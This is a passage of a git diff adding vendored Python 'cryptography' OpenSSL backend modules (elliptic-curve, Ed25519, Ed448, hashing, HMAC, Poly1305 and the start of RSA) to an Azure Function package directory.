UnsupportedAlgorithm, + _Reasons, +) +from cryptography.hazmat.backends.openssl.utils import ( + _calculate_digest_and_algorithm, + _evp_pkey_derive, +) +from cryptography.hazmat.primitives import serialization +from cryptography.hazmat.primitives.asymmetric import ec + +if typing.TYPE_CHECKING: + from cryptography.hazmat.backends.openssl.backend import Backend + + +def _check_signature_algorithm( + signature_algorithm: ec.EllipticCurveSignatureAlgorithm, +) -> None: + if not isinstance(signature_algorithm, ec.ECDSA): + raise UnsupportedAlgorithm( + "Unsupported elliptic curve signature algorithm.", + _Reasons.UNSUPPORTED_PUBLIC_KEY_ALGORITHM, + ) + + +def _ec_key_curve_sn(backend: "Backend", ec_key) -> str: + group = backend._lib.EC_KEY_get0_group(ec_key) + backend.openssl_assert(group != backend._ffi.NULL) + + nid = backend._lib.EC_GROUP_get_curve_name(group) + # The following check is to find EC keys with unnamed curves and raise + # an error for now. + if nid == backend._lib.NID_undef: + raise ValueError( + "ECDSA keys with explicit parameters are unsupported at this time" + ) + + # This is like the above check, but it also catches the case where you + # explicitly encoded a curve with the same parameters as a named curve. + # Don't do that. + if ( + not backend._lib.CRYPTOGRAPHY_IS_LIBRESSL + and backend._lib.EC_GROUP_get_asn1_flag(group) == 0 + ): + raise ValueError( + "ECDSA keys with explicit parameters are unsupported at this time" + ) + + curve_name = backend._lib.OBJ_nid2sn(nid) + backend.openssl_assert(curve_name != backend._ffi.NULL) + + sn = backend._ffi.string(curve_name).decode("ascii") + return sn + + +def _mark_asn1_named_ec_curve(backend: "Backend", ec_cdata): + """ + Set the named curve flag on the EC_KEY. This causes OpenSSL to + serialize EC keys along with their curve OID which makes + deserialization easier. + """ + + backend._lib.EC_KEY_set_asn1_flag( + ec_cdata, backend._lib.OPENSSL_EC_NAMED_CURVE + ) + + +def _check_key_infinity(backend: "Backend", ec_cdata) -> None: + point = backend._lib.EC_KEY_get0_public_key(ec_cdata) + backend.openssl_assert(point != backend._ffi.NULL) + group = backend._lib.EC_KEY_get0_group(ec_cdata) + backend.openssl_assert(group != backend._ffi.NULL) + if backend._lib.EC_POINT_is_at_infinity(group, point): + raise ValueError( + "Cannot load an EC public key where the point is at infinity" + ) + + +def _sn_to_elliptic_curve(backend: "Backend", sn: str) -> ec.EllipticCurve: + try: + return ec._CURVE_TYPES[sn]() + except KeyError: + raise UnsupportedAlgorithm( + "{} is not a supported elliptic curve".format(sn), + _Reasons.UNSUPPORTED_ELLIPTIC_CURVE, + ) + + +def _ecdsa_sig_sign( + backend: "Backend", private_key: "_EllipticCurvePrivateKey", data: bytes +) -> bytes: + max_size = backend._lib.ECDSA_size(private_key._ec_key) + backend.openssl_assert(max_size > 0) + + sigbuf = backend._ffi.new("unsigned char[]", max_size) + siglen_ptr = backend._ffi.new("unsigned int[]", 1) + res = backend._lib.ECDSA_sign( + 0, data, len(data), sigbuf, siglen_ptr, private_key._ec_key + ) + backend.openssl_assert(res == 1) + return backend._ffi.buffer(sigbuf)[: siglen_ptr[0]] + + +def _ecdsa_sig_verify( + backend: "Backend", + public_key: "_EllipticCurvePublicKey", + signature: bytes, + data: bytes, +) -> None: + res = backend._lib.ECDSA_verify( + 0, data, len(data), signature, len(signature), public_key._ec_key + ) + if res != 1: + backend._consume_errors() + raise InvalidSignature + + +class _EllipticCurvePrivateKey(ec.EllipticCurvePrivateKey): + def __init__(self, backend: "Backend", ec_key_cdata, evp_pkey): + self._backend = backend + self._ec_key = ec_key_cdata + self._evp_pkey = evp_pkey + + sn = _ec_key_curve_sn(backend, ec_key_cdata) + self._curve = _sn_to_elliptic_curve(backend, sn) + _mark_asn1_named_ec_curve(backend, ec_key_cdata) + _check_key_infinity(backend, ec_key_cdata) + + @property + def curve(self) -> ec.EllipticCurve: + return self._curve + + @property + def key_size(self) -> int: + return self.curve.key_size + + def exchange( + self, algorithm: ec.ECDH, peer_public_key: ec.EllipticCurvePublicKey + ) -> bytes: + if not ( + self._backend.elliptic_curve_exchange_algorithm_supported( + algorithm, self.curve + ) + ): + raise UnsupportedAlgorithm( + "This backend does not support the ECDH algorithm.", + _Reasons.UNSUPPORTED_EXCHANGE_ALGORITHM, + ) + + if peer_public_key.curve.name != self.curve.name: + raise ValueError( + "peer_public_key and self are not on the same curve" + ) + + return _evp_pkey_derive(self._backend, self._evp_pkey, peer_public_key) + + def public_key(self) -> ec.EllipticCurvePublicKey: + group = self._backend._lib.EC_KEY_get0_group(self._ec_key) + self._backend.openssl_assert(group != self._backend._ffi.NULL) + + curve_nid = self._backend._lib.EC_GROUP_get_curve_name(group) + public_ec_key = self._backend._ec_key_new_by_curve_nid(curve_nid) + + point = self._backend._lib.EC_KEY_get0_public_key(self._ec_key) + self._backend.openssl_assert(point != self._backend._ffi.NULL) + + res = self._backend._lib.EC_KEY_set_public_key(public_ec_key, point) + self._backend.openssl_assert(res == 1) + + evp_pkey = self._backend._ec_cdata_to_evp_pkey(public_ec_key) + + return _EllipticCurvePublicKey(self._backend, public_ec_key, evp_pkey) + + def private_numbers(self) -> ec.EllipticCurvePrivateNumbers: + bn = self._backend._lib.EC_KEY_get0_private_key(self._ec_key) + private_value = self._backend._bn_to_int(bn) + return ec.EllipticCurvePrivateNumbers( + private_value=private_value, + public_numbers=self.public_key().public_numbers(), + ) + + def private_bytes( + self, + encoding: serialization.Encoding, + format: serialization.PrivateFormat, + encryption_algorithm: serialization.KeySerializationEncryption, + ) -> bytes: + return self._backend._private_key_bytes( + encoding, + format, + encryption_algorithm, + self, + self._evp_pkey, + self._ec_key, + ) + + def sign( + self, + data: bytes, + signature_algorithm: ec.EllipticCurveSignatureAlgorithm, + ) -> bytes: + _check_signature_algorithm(signature_algorithm) + data, _ = _calculate_digest_and_algorithm( + data, + signature_algorithm.algorithm, + ) + return _ecdsa_sig_sign(self._backend, self, data) + + +class _EllipticCurvePublicKey(ec.EllipticCurvePublicKey): + def __init__(self, backend: "Backend", ec_key_cdata, evp_pkey): + self._backend = backend + self._ec_key = ec_key_cdata + self._evp_pkey = evp_pkey + + sn = _ec_key_curve_sn(backend, ec_key_cdata) + self._curve = _sn_to_elliptic_curve(backend, sn) + _mark_asn1_named_ec_curve(backend, ec_key_cdata) + _check_key_infinity(backend, ec_key_cdata) + + @property + def curve(self) -> ec.EllipticCurve: + return self._curve + + @property + def key_size(self) -> int: + return self.curve.key_size + + def public_numbers(self) -> ec.EllipticCurvePublicNumbers: + get_func, group = self._backend._ec_key_determine_group_get_func( + self._ec_key + ) + point = self._backend._lib.EC_KEY_get0_public_key(self._ec_key) + self._backend.openssl_assert(point != self._backend._ffi.NULL) + + with self._backend._tmp_bn_ctx() as bn_ctx: + bn_x = self._backend._lib.BN_CTX_get(bn_ctx) + bn_y = self._backend._lib.BN_CTX_get(bn_ctx) + + res = get_func(group, point, bn_x, bn_y, bn_ctx) + self._backend.openssl_assert(res == 1) + + x = self._backend._bn_to_int(bn_x) + y = self._backend._bn_to_int(bn_y) + + return ec.EllipticCurvePublicNumbers(x=x, y=y, curve=self._curve) + + def _encode_point(self, format: serialization.PublicFormat) -> bytes: + if format is serialization.PublicFormat.CompressedPoint: + conversion = self._backend._lib.POINT_CONVERSION_COMPRESSED + else: + assert format is serialization.PublicFormat.UncompressedPoint + conversion = self._backend._lib.POINT_CONVERSION_UNCOMPRESSED + + group = self._backend._lib.EC_KEY_get0_group(self._ec_key) + self._backend.openssl_assert(group != self._backend._ffi.NULL) + point = self._backend._lib.EC_KEY_get0_public_key(self._ec_key) + self._backend.openssl_assert(point != self._backend._ffi.NULL) + with self._backend._tmp_bn_ctx() as bn_ctx: + buflen = self._backend._lib.EC_POINT_point2oct( + group, point, conversion, self._backend._ffi.NULL, 0, bn_ctx + ) + self._backend.openssl_assert(buflen > 0) + buf = self._backend._ffi.new("char[]", buflen) + res = self._backend._lib.EC_POINT_point2oct( + group, point, conversion, buf, buflen, bn_ctx + ) + self._backend.openssl_assert(buflen == res) + + return self._backend._ffi.buffer(buf)[:] + + def public_bytes( + self, + encoding: serialization.Encoding, + format: serialization.PublicFormat, + ) -> bytes: + if ( + encoding is serialization.Encoding.X962 + or format is serialization.PublicFormat.CompressedPoint + or format is serialization.PublicFormat.UncompressedPoint + ): + if encoding is not serialization.Encoding.X962 or format not in ( + serialization.PublicFormat.CompressedPoint, + serialization.PublicFormat.UncompressedPoint, + ): + raise ValueError( + "X962 encoding must be used with CompressedPoint or " + "UncompressedPoint format" + ) + + return self._encode_point(format) + else: + return self._backend._public_key_bytes( + encoding, format, self, self._evp_pkey, None + ) + + def verify( + self, + signature: bytes, + data: bytes, + signature_algorithm: ec.EllipticCurveSignatureAlgorithm, + ) -> None: + _check_signature_algorithm(signature_algorithm) + data, _ = _calculate_digest_and_algorithm( + data, + signature_algorithm.algorithm, + ) + _ecdsa_sig_verify(self._backend, self, signature, data) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/ed25519.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/ed25519.py new file mode 100644 index 0000000..401d78d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/ed25519.py @@ -0,0 +1,155 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import typing + +from cryptography import exceptions +from cryptography.hazmat.primitives import serialization +from cryptography.hazmat.primitives.asymmetric.ed25519 import ( + Ed25519PrivateKey, + Ed25519PublicKey, + _ED25519_KEY_SIZE, + _ED25519_SIG_SIZE, +) + +if typing.TYPE_CHECKING: + from cryptography.hazmat.backends.openssl.backend import Backend + + +class _Ed25519PublicKey(Ed25519PublicKey): + def __init__(self, backend: "Backend", evp_pkey): + self._backend = backend + self._evp_pkey = evp_pkey + + def public_bytes( + self, + encoding: serialization.Encoding, + format: serialization.PublicFormat, + ) -> bytes: + if ( + encoding is serialization.Encoding.Raw + or format is serialization.PublicFormat.Raw + ): + if ( + encoding is not serialization.Encoding.Raw + or format is not serialization.PublicFormat.Raw + ): + raise ValueError( + "When using Raw both encoding and format must be Raw" + ) + + return self._raw_public_bytes() + + return self._backend._public_key_bytes( + encoding, format, self, self._evp_pkey, None + ) + + def _raw_public_bytes(self) -> bytes: + buf = self._backend._ffi.new("unsigned char []", _ED25519_KEY_SIZE) + buflen = self._backend._ffi.new("size_t *", _ED25519_KEY_SIZE) + res = self._backend._lib.EVP_PKEY_get_raw_public_key( + self._evp_pkey, buf, buflen + ) + self._backend.openssl_assert(res == 1) + self._backend.openssl_assert(buflen[0] == _ED25519_KEY_SIZE) + return self._backend._ffi.buffer(buf, _ED25519_KEY_SIZE)[:] + + def verify(self, signature: bytes, data: bytes) -> None: + evp_md_ctx = self._backend._lib.EVP_MD_CTX_new() + self._backend.openssl_assert(evp_md_ctx != self._backend._ffi.NULL) + evp_md_ctx = self._backend._ffi.gc( + evp_md_ctx, self._backend._lib.EVP_MD_CTX_free + ) + res = self._backend._lib.EVP_DigestVerifyInit( + evp_md_ctx, + self._backend._ffi.NULL, + self._backend._ffi.NULL, + self._backend._ffi.NULL, + self._evp_pkey, + ) + self._backend.openssl_assert(res == 1) + res = self._backend._lib.EVP_DigestVerify( + evp_md_ctx, signature, len(signature), data, len(data) + ) + if res != 1: + self._backend._consume_errors() + raise exceptions.InvalidSignature + + +class _Ed25519PrivateKey(Ed25519PrivateKey): + def __init__(self, backend: "Backend", evp_pkey): + self._backend = backend + self._evp_pkey = evp_pkey + + def public_key(self) -> Ed25519PublicKey: + buf = self._backend._ffi.new("unsigned char []", _ED25519_KEY_SIZE) + buflen = self._backend._ffi.new("size_t *", _ED25519_KEY_SIZE) + res = self._backend._lib.EVP_PKEY_get_raw_public_key( + self._evp_pkey, buf, buflen + ) + self._backend.openssl_assert(res == 1) + self._backend.openssl_assert(buflen[0] == _ED25519_KEY_SIZE) + public_bytes = self._backend._ffi.buffer(buf)[:] + return self._backend.ed25519_load_public_bytes(public_bytes) + + def sign(self, data: bytes) -> bytes: + evp_md_ctx = self._backend._lib.EVP_MD_CTX_new() + self._backend.openssl_assert(evp_md_ctx != self._backend._ffi.NULL) + evp_md_ctx = self._backend._ffi.gc( + evp_md_ctx, self._backend._lib.EVP_MD_CTX_free + ) + res = self._backend._lib.EVP_DigestSignInit( + evp_md_ctx, + self._backend._ffi.NULL, + self._backend._ffi.NULL, + self._backend._ffi.NULL, + self._evp_pkey, + ) + self._backend.openssl_assert(res == 1) + buf = self._backend._ffi.new("unsigned char[]", _ED25519_SIG_SIZE) + buflen = self._backend._ffi.new("size_t *", len(buf)) + res = self._backend._lib.EVP_DigestSign( + evp_md_ctx, buf, buflen, data, len(data) + ) + self._backend.openssl_assert(res == 1) + self._backend.openssl_assert(buflen[0] == _ED25519_SIG_SIZE) + return self._backend._ffi.buffer(buf, buflen[0])[:] + + def private_bytes( + self, + encoding: serialization.Encoding, + format: serialization.PrivateFormat, + encryption_algorithm: serialization.KeySerializationEncryption, + ) -> bytes: + if ( + encoding is serialization.Encoding.Raw + or format is serialization.PublicFormat.Raw + ): + if ( + format is not serialization.PrivateFormat.Raw + or encoding is not serialization.Encoding.Raw + or not isinstance( + encryption_algorithm, serialization.NoEncryption + ) + ): + raise ValueError( + "When using Raw both encoding and format must be Raw " + "and encryption_algorithm must be NoEncryption()" + ) + + return self._raw_private_bytes() + + return self._backend._private_key_bytes( + encoding, format, encryption_algorithm, self, self._evp_pkey, None + ) + + def _raw_private_bytes(self) -> bytes: + buf = self._backend._ffi.new("unsigned char []", _ED25519_KEY_SIZE) + buflen = self._backend._ffi.new("size_t *", _ED25519_KEY_SIZE) + res = self._backend._lib.EVP_PKEY_get_raw_private_key( + self._evp_pkey, buf, buflen + ) + self._backend.openssl_assert(res == 1) + self._backend.openssl_assert(buflen[0] == _ED25519_KEY_SIZE) + return self._backend._ffi.buffer(buf, _ED25519_KEY_SIZE)[:] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/ed448.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/ed448.py new file mode 100644 index 0000000..1db2c14 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/ed448.py @@ -0,0 +1,156 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import typing + +from cryptography import exceptions +from cryptography.hazmat.primitives import serialization +from cryptography.hazmat.primitives.asymmetric.ed448 import ( + Ed448PrivateKey, + Ed448PublicKey, +) + +if typing.TYPE_CHECKING: + from cryptography.hazmat.backends.openssl.backend import Backend + +_ED448_KEY_SIZE = 57 +_ED448_SIG_SIZE = 114 + + +class _Ed448PublicKey(Ed448PublicKey): + def __init__(self, backend: "Backend", evp_pkey): + self._backend = backend + self._evp_pkey = evp_pkey + + def public_bytes( + self, + encoding: serialization.Encoding, + format: serialization.PublicFormat, + ) -> bytes: + if ( + encoding is serialization.Encoding.Raw + or format is serialization.PublicFormat.Raw + ): + if ( + encoding is not serialization.Encoding.Raw + or format is not serialization.PublicFormat.Raw + ): + raise ValueError( + "When using Raw both encoding and format must be Raw" + ) + + return self._raw_public_bytes() + + return self._backend._public_key_bytes( + encoding, format, self, self._evp_pkey, None + ) + + def _raw_public_bytes(self) -> bytes: + buf = self._backend._ffi.new("unsigned char []", _ED448_KEY_SIZE) + buflen = self._backend._ffi.new("size_t *", _ED448_KEY_SIZE) + res = self._backend._lib.EVP_PKEY_get_raw_public_key( + self._evp_pkey, buf, buflen + ) + self._backend.openssl_assert(res == 1) + self._backend.openssl_assert(buflen[0] == _ED448_KEY_SIZE) + return self._backend._ffi.buffer(buf, _ED448_KEY_SIZE)[:] + + def verify(self, signature: bytes, data: bytes) -> None: + evp_md_ctx = self._backend._lib.EVP_MD_CTX_new() + self._backend.openssl_assert(evp_md_ctx != self._backend._ffi.NULL) + evp_md_ctx = self._backend._ffi.gc( + evp_md_ctx, self._backend._lib.EVP_MD_CTX_free + ) + res = self._backend._lib.EVP_DigestVerifyInit( + evp_md_ctx, + self._backend._ffi.NULL, + self._backend._ffi.NULL, + self._backend._ffi.NULL, + self._evp_pkey, + ) + self._backend.openssl_assert(res == 1) + res = self._backend._lib.EVP_DigestVerify( + evp_md_ctx, signature, len(signature), data, len(data) + ) + if res != 1: + self._backend._consume_errors() + raise exceptions.InvalidSignature + + +class _Ed448PrivateKey(Ed448PrivateKey): + def __init__(self, backend: "Backend", evp_pkey): + self._backend = backend + self._evp_pkey = evp_pkey + + def public_key(self) -> Ed448PublicKey: + buf = self._backend._ffi.new("unsigned char []", _ED448_KEY_SIZE) + buflen = self._backend._ffi.new("size_t *", _ED448_KEY_SIZE) + res = self._backend._lib.EVP_PKEY_get_raw_public_key( + self._evp_pkey, buf, buflen + ) + self._backend.openssl_assert(res == 1) + self._backend.openssl_assert(buflen[0] == _ED448_KEY_SIZE) + public_bytes = self._backend._ffi.buffer(buf)[:] + return self._backend.ed448_load_public_bytes(public_bytes) + + def sign(self, data: bytes) -> bytes: + evp_md_ctx = self._backend._lib.EVP_MD_CTX_new() + self._backend.openssl_assert(evp_md_ctx != self._backend._ffi.NULL) + evp_md_ctx = self._backend._ffi.gc( + evp_md_ctx, self._backend._lib.EVP_MD_CTX_free + ) + res = self._backend._lib.EVP_DigestSignInit( + evp_md_ctx, + self._backend._ffi.NULL, + self._backend._ffi.NULL, + self._backend._ffi.NULL, + self._evp_pkey, + ) + self._backend.openssl_assert(res == 1) + buf = self._backend._ffi.new("unsigned char[]", _ED448_SIG_SIZE) + buflen = self._backend._ffi.new("size_t *", len(buf)) + res = self._backend._lib.EVP_DigestSign( + evp_md_ctx, buf, buflen, data, len(data) + ) + self._backend.openssl_assert(res == 1) + self._backend.openssl_assert(buflen[0] == _ED448_SIG_SIZE) + return self._backend._ffi.buffer(buf, buflen[0])[:] + + def private_bytes( + self, + encoding: serialization.Encoding, + format: serialization.PrivateFormat, + encryption_algorithm: serialization.KeySerializationEncryption, + ) -> bytes: + if ( + encoding is serialization.Encoding.Raw + or format is serialization.PublicFormat.Raw + ): + if ( + format is not serialization.PrivateFormat.Raw + or encoding is not serialization.Encoding.Raw + or not isinstance( + encryption_algorithm, serialization.NoEncryption + ) + ): + raise ValueError( + "When using Raw both encoding and format must be Raw " + "and encryption_algorithm must be NoEncryption()" + ) + + return self._raw_private_bytes() + + return self._backend._private_key_bytes( + encoding, format, encryption_algorithm, self, self._evp_pkey, None + ) + + def _raw_private_bytes(self) -> bytes: + buf = self._backend._ffi.new("unsigned char []", _ED448_KEY_SIZE) + buflen = self._backend._ffi.new("size_t *", _ED448_KEY_SIZE) + res = self._backend._lib.EVP_PKEY_get_raw_private_key( + self._evp_pkey, buf, buflen + ) + self._backend.openssl_assert(res == 1) + self._backend.openssl_assert(buflen[0] == _ED448_KEY_SIZE) + return self._backend._ffi.buffer(buf, _ED448_KEY_SIZE)[:] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/encode_asn1.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/encode_asn1.py new file mode 100644 index 0000000..21187fd --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/encode_asn1.py @@ -0,0 +1,18 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +from cryptography import x509 + + +_CRLREASONFLAGS = { + x509.ReasonFlags.key_compromise: 1, + x509.ReasonFlags.ca_compromise: 2, + x509.ReasonFlags.affiliation_changed: 3, + x509.ReasonFlags.superseded: 4, + x509.ReasonFlags.cessation_of_operation: 5, + x509.ReasonFlags.certificate_hold: 6, + x509.ReasonFlags.privilege_withdrawn: 7, + x509.ReasonFlags.aa_compromise: 8, +} diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/hashes.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/hashes.py new file mode 100644 index 0000000..e53182a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/hashes.py @@ -0,0 +1,87 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import typing + +from cryptography.exceptions import UnsupportedAlgorithm, _Reasons +from cryptography.hazmat.primitives import hashes + + +if typing.TYPE_CHECKING: + from cryptography.hazmat.backends.openssl.backend import Backend + + +class _HashContext(hashes.HashContext): + def __init__( + self, backend: "Backend", algorithm: hashes.HashAlgorithm, ctx=None + ) -> None: + self._algorithm = algorithm + + self._backend = backend + + if ctx is None: + ctx = self._backend._lib.EVP_MD_CTX_new() + ctx = self._backend._ffi.gc( + ctx, self._backend._lib.EVP_MD_CTX_free + ) + evp_md = self._backend._evp_md_from_algorithm(algorithm) + if evp_md == self._backend._ffi.NULL: + raise UnsupportedAlgorithm( + "{} is not a supported hash on this backend.".format( + algorithm.name + ), + _Reasons.UNSUPPORTED_HASH, + ) + res = self._backend._lib.EVP_DigestInit_ex( + ctx, evp_md, self._backend._ffi.NULL + ) + self._backend.openssl_assert(res != 0) + + self._ctx = ctx + + @property + def algorithm(self) -> hashes.HashAlgorithm: + return self._algorithm + + def copy(self) -> "_HashContext": + copied_ctx = self._backend._lib.EVP_MD_CTX_new() + copied_ctx = self._backend._ffi.gc( + copied_ctx, self._backend._lib.EVP_MD_CTX_free + ) + res = self._backend._lib.EVP_MD_CTX_copy_ex(copied_ctx, self._ctx) + self._backend.openssl_assert(res != 0) + return _HashContext(self._backend, self.algorithm, ctx=copied_ctx) + + def update(self, data: bytes) -> None: + data_ptr = self._backend._ffi.from_buffer(data) + res = self._backend._lib.EVP_DigestUpdate( + self._ctx, data_ptr, len(data) + ) + self._backend.openssl_assert(res != 0) + + def finalize(self) -> bytes: + if isinstance(self.algorithm, hashes.ExtendableOutputFunction): + # extendable output functions use a different finalize + return self._finalize_xof() + else: + buf = self._backend._ffi.new( + "unsigned char[]", self._backend._lib.EVP_MAX_MD_SIZE + ) + outlen = self._backend._ffi.new("unsigned int *") + res = self._backend._lib.EVP_DigestFinal_ex(self._ctx, buf, outlen) + self._backend.openssl_assert(res != 0) + self._backend.openssl_assert( + outlen[0] == self.algorithm.digest_size + ) + return self._backend._ffi.buffer(buf)[: outlen[0]] + + def _finalize_xof(self) -> bytes: + buf = self._backend._ffi.new( + "unsigned char[]", self.algorithm.digest_size + ) + res = self._backend._lib.EVP_DigestFinalXOF( + self._ctx, buf, self.algorithm.digest_size + ) + self._backend.openssl_assert(res != 0) + return self._backend._ffi.buffer(buf)[: self.algorithm.digest_size] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/hmac.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/hmac.py new file mode 100644 index 0000000..2427395 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/hmac.py @@ -0,0 +1,85 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import typing + +from cryptography.exceptions import ( + InvalidSignature, + UnsupportedAlgorithm, + _Reasons, +) +from cryptography.hazmat.primitives import constant_time, hashes + + +if typing.TYPE_CHECKING: + from cryptography.hazmat.backends.openssl.backend import Backend + + +class _HMACContext(hashes.HashContext): + def __init__( + self, + backend: "Backend", + key: bytes, + algorithm: hashes.HashAlgorithm, + ctx=None, + ): + self._algorithm = algorithm + self._backend = backend + + if ctx is None: + ctx = self._backend._lib.HMAC_CTX_new() + self._backend.openssl_assert(ctx != self._backend._ffi.NULL) + ctx = self._backend._ffi.gc(ctx, self._backend._lib.HMAC_CTX_free) + evp_md = self._backend._evp_md_from_algorithm(algorithm) + if evp_md == self._backend._ffi.NULL: + raise UnsupportedAlgorithm( + "{} is not a supported hash on this backend".format( + algorithm.name + ), + _Reasons.UNSUPPORTED_HASH, + ) + key_ptr = self._backend._ffi.from_buffer(key) + res = self._backend._lib.HMAC_Init_ex( + ctx, key_ptr, len(key), evp_md, self._backend._ffi.NULL + ) + self._backend.openssl_assert(res != 0) + + self._ctx = ctx + self._key = key + + @property + def algorithm(self) -> hashes.HashAlgorithm: + return self._algorithm + + def copy(self) -> "_HMACContext": + copied_ctx = self._backend._lib.HMAC_CTX_new() + self._backend.openssl_assert(copied_ctx != self._backend._ffi.NULL) + copied_ctx = self._backend._ffi.gc( + copied_ctx, self._backend._lib.HMAC_CTX_free + ) + res = self._backend._lib.HMAC_CTX_copy(copied_ctx, self._ctx) + self._backend.openssl_assert(res != 0) + return _HMACContext( + self._backend, self._key, self.algorithm, ctx=copied_ctx + ) + + def update(self, data: bytes) -> None: + data_ptr = self._backend._ffi.from_buffer(data) + res = self._backend._lib.HMAC_Update(self._ctx, data_ptr, len(data)) + self._backend.openssl_assert(res != 0) + + def finalize(self) -> bytes: + buf = self._backend._ffi.new( + "unsigned char[]", self._backend._lib.EVP_MAX_MD_SIZE + ) + outlen = self._backend._ffi.new("unsigned int *") + res = self._backend._lib.HMAC_Final(self._ctx, buf, outlen) + self._backend.openssl_assert(res != 0) + self._backend.openssl_assert(outlen[0] == self.algorithm.digest_size) + return self._backend._ffi.buffer(buf)[: outlen[0]] + + def verify(self, signature: bytes) -> None: + digest = self.finalize() + if not constant_time.bytes_eq(digest, signature): + raise InvalidSignature("Signature did not match digest.") diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/poly1305.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/poly1305.py new file mode 100644 index 0000000..6673c5f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/poly1305.py @@ -0,0 +1,68 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import typing + +from cryptography.exceptions import InvalidSignature +from cryptography.hazmat.primitives import constant_time + + +_POLY1305_TAG_SIZE = 16 +_POLY1305_KEY_SIZE = 32 + + +if typing.TYPE_CHECKING: + from cryptography.hazmat.backends.openssl.backend import Backend + + +class _Poly1305Context: + def __init__(self, backend: "Backend", key: bytes) -> None: + self._backend = backend + + key_ptr = self._backend._ffi.from_buffer(key) + # This function copies the key into OpenSSL-owned memory so we don't + # need to retain it ourselves + evp_pkey = self._backend._lib.EVP_PKEY_new_raw_private_key( + self._backend._lib.NID_poly1305, + self._backend._ffi.NULL, + key_ptr, + len(key), + ) + self._backend.openssl_assert(evp_pkey != self._backend._ffi.NULL) + self._evp_pkey = self._backend._ffi.gc( + evp_pkey, self._backend._lib.EVP_PKEY_free + ) + ctx = self._backend._lib.EVP_MD_CTX_new() + self._backend.openssl_assert(ctx != self._backend._ffi.NULL) + self._ctx = self._backend._ffi.gc( + ctx, self._backend._lib.EVP_MD_CTX_free + ) + res = self._backend._lib.EVP_DigestSignInit( + self._ctx, + self._backend._ffi.NULL, + self._backend._ffi.NULL, + self._backend._ffi.NULL, + self._evp_pkey, + ) + self._backend.openssl_assert(res == 1) + + def update(self, data: bytes) -> None: + data_ptr = self._backend._ffi.from_buffer(data) + res = self._backend._lib.EVP_DigestSignUpdate( + self._ctx, data_ptr, len(data) + ) + self._backend.openssl_assert(res != 0) + + def finalize(self) -> bytes: + buf = self._backend._ffi.new("unsigned char[]", _POLY1305_TAG_SIZE) + outlen = self._backend._ffi.new("size_t *", _POLY1305_TAG_SIZE) + res = self._backend._lib.EVP_DigestSignFinal(self._ctx, buf, outlen) + self._backend.openssl_assert(res != 0) + self._backend.openssl_assert(outlen[0] == _POLY1305_TAG_SIZE) + return self._backend._ffi.buffer(buf)[: outlen[0]] + + def verify(self, tag: bytes) -> None: + mac = self.finalize() + if not constant_time.bytes_eq(mac, tag): + raise InvalidSignature("Value did not match computed tag.") diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/rsa.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/rsa.py new file mode 100644 index 0000000..fe2434b --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/rsa.py @@ -0,0 +1,567 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import typing + +from cryptography.exceptions import ( + InvalidSignature, + UnsupportedAlgorithm, + _Reasons, +) +from cryptography.hazmat.backends.openssl.utils import ( + _calculate_digest_and_algorithm, +) +from cryptography.hazmat.primitives import hashes, serialization +from cryptography.hazmat.primitives.asymmetric import ( + utils as asym_utils, +) +from cryptography.hazmat.primitives.asymmetric.padding import ( + AsymmetricPadding, + MGF1, + OAEP, + PKCS1v15, + PSS, + _Auto, + _DigestLength, + _MaxLength, + calculate_max_pss_salt_length, +) +from cryptography.hazmat.primitives.asymmetric.rsa import ( + RSAPrivateKey, + RSAPrivateNumbers, + RSAPublicKey, + RSAPublicNumbers, +) + + +if typing.TYPE_CHECKING: + from cryptography.hazmat.backends.openssl.backend import Backend + + +def _get_rsa_pss_salt_length( + backend: "Backend", + pss: PSS, + key: 